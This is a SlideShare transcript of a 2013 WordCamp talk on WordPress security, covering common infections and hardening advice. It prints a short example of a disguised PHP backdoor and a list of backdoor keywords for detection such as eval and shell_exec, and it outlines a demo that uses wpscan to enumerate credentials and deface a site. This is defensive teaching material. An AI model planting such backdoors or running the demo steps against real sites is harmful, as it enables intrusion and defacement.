• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
WordPress Security - WordCamp phoenix 2013

WordPress Security - WordCamp phoenix 2013



WordPress security at WordCamp Phoenix 2013.

WordPress security at WordCamp Phoenix 2013.



Total Views
Views on SlideShare
Embed Views



13 Embeds 4,252

http://blog.sucuri.net 3783
http://wpdaily.co 321
http://feeds.feedburner.com 42
http://www.interactivelimited.com 41
http://eventifier.co 29
http://torquemag.io 13
http://kred.com 9
http://newsblur.com 5
http://translate.googleusercontent.com 3
http://www.ofelio.com 2
http://www.newsblur.com 2
http://www.twylah.com 1
http://smashingreader.com 1



Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

    WordPress Security - WordCamp phoenix 2013  WordPress Security - WordCamp phoenix 2013 Presentation Transcript

    • WordPress SecurityDealing with Today’s Hacks
    • If you don’t ask, you don’t get! • Dre Armeda, CISSP • CEO, Co-Founder at Sucuri Inc. • @dremeda • Dre.im Im a Harley enthusiast, and a Chargers fan. I wear many hats, and love tacos. Im infatuated with WordPress, web design, and web security. I work at Sucuri Security. I hope to help make the web a safer place!1/19/2013 Dre Armeda - @dremeda #wcphx
    • Why listen to me? You don’t have to, but…• 12 years running IT, IS, Crypto, InfoSec & PhySec for the US Navy. – Managed security awareness for Sempra Energy – Deployed security suite for 1-800-Flowers. – Cleaned Martha Steward web properties of malware• Not an expert, passionate enthusiast.• Seriously though – Quick Sucuri stats: – Remediate 200 – 300 infected websites a day, • 24/7/365 – Perform 2 million + malware website scans a month – Support all CMS platforms and custom applications (e.g., WordPress, Joomla, osCommerce, vBulletin, Drupal, .NET, etc… ) My goal in life is to make the web a safer place!1/19/2013 Dre Armeda - @dremeda #wcphx
    • Thoughts To Kick Things Off• Information Security is about risk reduction. – If you’re looking for the “silver bullet” this is the wrong talk for you.• To think that you will never be infected is like saying you will never be sick. – Someone tells you different – Percussion calibration time• Prevention is ideal, but not realistic. – Risk will never be 0% – Detection is key.1/19/2013 Dre Armeda - @dremeda #wcphx
    • Know Your Enemy• They have time & resources• They are intelligent• Attacks are automated• Goal is to impact quantity• Own one, own them all…• It’s not personal 1/19/2013 Dre Armeda - @dremeda #wcphx
    • Ok, so what’s the problem?TODAY’S ISSUES:• The Ecosystem / Environment• Access Control• Software Vulnerabilities• Administration• Credential Management• Extensibility1/19/2013 Dre Armeda - @dremeda #wcphx
    • Today’s Focus• Ecosystem / Environment• Access Control• Dealing with Hacks1/19/2013 Dre Armeda - @dremeda #wcphx
    • Logical Architecture Linux Operating System Apache MySQL PHP WordPress CPANEL Plesk phpMyAdmin PHP-CGI Modules Modules1/19/2013 Dre Armeda - @dremeda #wcphx
    • The EcoSystem / Environment• Apache – Malicious module injects iFrames – http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module- injects-iframes/• phpMyAdmin – Mirror Hacked – http://sourceforge.net/blog/phpmyadmin-back-door/• PHP-CGI – Remote Code Execution – http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the- wild.html• Plesk – Vulnerable to SQLi attacks – http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to- malware.html 1/19/2013 Dre Armeda - @dremeda #wcphx
    • The EcoSystem / Environment • What can you do? – Not much… completely outside of your control if you’re using a shared or managed host • But, you can reduce risk... – Use a Dedicated / VPS Environment • But recognize the responsibility that this entails, if you what I mentioned previously doesn’t make sense, skip to next step – Go with a Managed Host • Doesn’t mean you’ll be safer, but it does mean you’ll have resources to lean on1/19/2013 Dre Armeda - @dremeda #wcphx
    • Access is Key• We have to change the way we treat and think about access. All access – Server / Application• We are going through the same mistakes servers and desktops were making in the 90’s with access.• Know where you are surfing the web, do you really need to log in as an admin at the coffee shop?1/19/2013 Dre Armeda - @dremeda #wcphx
    • Before We Dive In1/19/2013 Dre Armeda - @dremeda #wcphx
    • WordPress Loving Infections• Defacements• Backdoors• Pharma Hack• Injections – iFrame Specifically• Malicious Redirects• Phishing1/19/2013 Dre Armeda - @dremeda #wcphx
    • Hacktivism at its finest… you now support a cause!?!?!DEFACEMENTS
    • Defacements• Hacktivism 101 – Annoying as S*&T• Places to look: – Index.html – Index.php • Root Directory • Wp-Content • Theme Directory• GREP is your friend: – grep –ri ‘sniper399’ .1/19/2013 Dre Armeda - @dremeda #wcphx
    • It’s ok to cry a little… BACKDOORS
    • Backdoors• Common terms: – Is_bot – Eval – Base64_decode – Fopen – Fclose – readfile – Edoced_46esad – Exec – System – Shell_exec – Gzuncompress – popen – FilesMan1/19/2013 Dre Armeda - @dremeda #wcphx
    • Erectile Dysfunction pills are leading ads.. Who knew.. PHARMA HACK
    • Pharma Hack• Multi-million $ Business• Rarely Distribute Malware• Impression based Affiliate Marketing• Google’s Search Engine Result Pages (SERP)• Odds of malware distribution are actually low• Tricks: – Embedded within core files – Look for “.tmp” directories = >1/19/2013 Dre Armeda - @dremeda #wcphx
    • Pharma Hack, cntd..• Try using CURL to emulate Google and Windows: Curl –L –A “Googlebot/2.1(+http://www.google.com/bot.html)” http://someinfectedwebsite.com – Google Webmaster Tools • Fetch as Google Bot• Check your Theme Index.php file for things like this: – <?php $wp__theme_icon=@create_function(”,@file_get_co ntents(‘/public_html/wp-content/themes/my-really- good-theme/images/s.jpg’));$wp__theme_icon(); ?>1/19/2013 Dre Armeda - @dremeda #wcphx
    • Pharma Hack, cntd..1/19/2013 Dre Armeda - @dremeda #wcphx
    • It only hurts for a minute…INJECTIONS
    • Injections• Invisible iFrame’s - Executing on your browser• Contributing to Drive-by-Downloads, Pharma, XSS, CSRF• Places to check – Pages that generate content: – JS files, Header.php, Index.php, Function.php, Footer.php1/19/2013 Dre Armeda - @dremeda #wcphx
    • Injections, cntd… • PHP iFrame Injection => – Count##.php – Check all Index.php / Theme JS files – Example below:1/19/2013 Dre Armeda - @dremeda #wcphx
    • Injections, cntd… • Pharma Link Injections => • Drive-By- Downloads1/19/2013 Dre Armeda - @dremeda #wcphx
    • WTF?!?! Why don’t I understand what it says?MALICIOUS REDIRECTS
    • Malicious Redirects • Redirects your user to a domain distributing malware, fundamentally different than an iframe injection that executes in your browser • 8 out of 10 times, check your .htaccess file – all of them – # find /var/www –name .htaccess –type f | wc –l • Check for backdoors also – often a sign of a bigger issue1/19/2013 Dre Armeda - @dremeda #wcphx
    • Biggest growing problem, exceptionally difficult to detect…PHISHING
    • Phishing• Growing at a faster pace than traditional web- malware• No impact to readers, but tied to SPAM bots sending out emails like this:1/19/2013 Dre Armeda - @dremeda #wcphx
    • Phishing, cntd…1/19/2013 Dre Armeda - @dremeda #wcphx
    • Bringing the Point HomeDEMONSTRATION
    • Demo Objective• Use good tools for bad things – wpscan• Enumerate the users• Enumrate Passwords• Own target WordPress site• Deface the Website I have 5 minutes – Ready?1/19/2013 Dre Armeda - @dremeda #wcphx
    • Remember the risk discussion?KEEPING IT REAL
    • Update • Oldest version found in production – 1.5 • Leading cause of cross-site contamination issues • Perhaps the simplest of tasks, yet we still find this:1/19/2013 Dre Armeda - @dremeda #wcphx
    • Access is Key• On the Server: – Kill accounts that are not in use – FTP is the devil – slap yourself and switch to SFTP – Disable password auth & use key pairs• WordPress Admin: – Multi-Factor Authentication on wp-admin – Two-Factor Authentication on wp-login.php• Employ least privileged: – Only use admin accounts for admin tasks – Learn to use Editor, Author, Contributor, Subscriber1/19/2013 Dre Armeda - @dremeda #wcphx
    • Password Dilemma • 15 character pass – 3 months to crack • Long / Complex / Unique – Key to Passwords • Prefer Password Manager – You don’t? ok.. – Passphrases work too • iLuvWCLpHX:2013:S@nT@N b@By • Come up with a process & stick to it: – One scheme: • Remember 8 characters • Write Down 8 characters • Save 20 characters – Second scheme: • Remember 20 characters • Prefix characters with site name • End sequence with some date1/19/2013 Dre Armeda - @dremeda #wcphx
    • Kill PHP Execution• Kill PHP Execution – Directories: • WP-INCLUDES • WP-CONTENT • UPLOADS – At a minimum <Files *.php> Deny from all </Files>1/19/2013 Dre Armeda - @dremeda #wcphx
    • Disable Theme / Plugin EditorI’d take it a step further and remove the ability to install, butthat’s just me.Modify WP-CONFIG.PHP With:• Disable the Plugin / Theme Editor – Define(‘DISALLOW_FILE_EDIT’,true); - OR -• Disable the Plugin / Theme Update and Installation – Define(‘DISALLOW_FILE_MODS’,true);1/19/2013 Dre Armeda - @dremeda #wcphx
    • Plugins That HelpSucuri Clients Non-Clients• Sucuri Security Plugin • Limit Login Attempts• Theme-Check • Theme-Check• BackupBuddy • BackupBuddy• Akismet • Akismet1/19/2013 Dre Armeda - @dremeda #wcphx
    • Need a Hand? Support Forums Online Resources • Hacked – • Sucuri Blog: http://wordpress.org/tags/ http://blog.sucuri.net hacked • SiteCheck Scanner: http://sitecheck.sucuri.net • Unmask Parasites: • Malware – http://unmaskparasites.com http://wordpress.org/tags/ • Perishable Press: malware http://perishablepress.com/ca tegory/web-design/security/ • Secunia Security Advisories: • BadwareBusters – http://secunia.com/communit https://badwarebusters.org y/advisories/search/?search= wordpress1/19/2013 Dre Armeda - @dremeda #wcphx
    • Dre Armeda, CISSP Dre.im @dremeda Sucuri Inc. http://sucuri.net http://blog.sucuri.net @sucuri_security Thanks to Tony Perez @perezbox for allowing me to cannibalize his slide deck.1/19/2013 Dre Armeda - @dremeda #wcphx